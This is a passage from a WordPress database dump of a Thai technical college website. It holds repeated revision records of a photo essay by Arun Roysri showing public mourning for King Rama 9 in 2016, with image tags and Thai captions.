height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4332\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<img class=\"aligncenter size-large wp-image-4333\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4337\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4338\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4340\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:14:41', '2018-11-12 08:14:41', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4411, 3, '2018-11-12 15:18:00', '2018-11-12 08:18:00', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4327\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4328\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n<p style=\"text-align: center;\">\"</p>\r\n<img class=\"aligncenter size-large wp-image-4329\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4332\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<img class=\"aligncenter size-large wp-image-4333\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4337\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4338\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4340\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:18:00', '2018-11-12 08:18:00', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4412, 3, '2018-11-12 15:19:46', '2018-11-12 08:19:46', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: 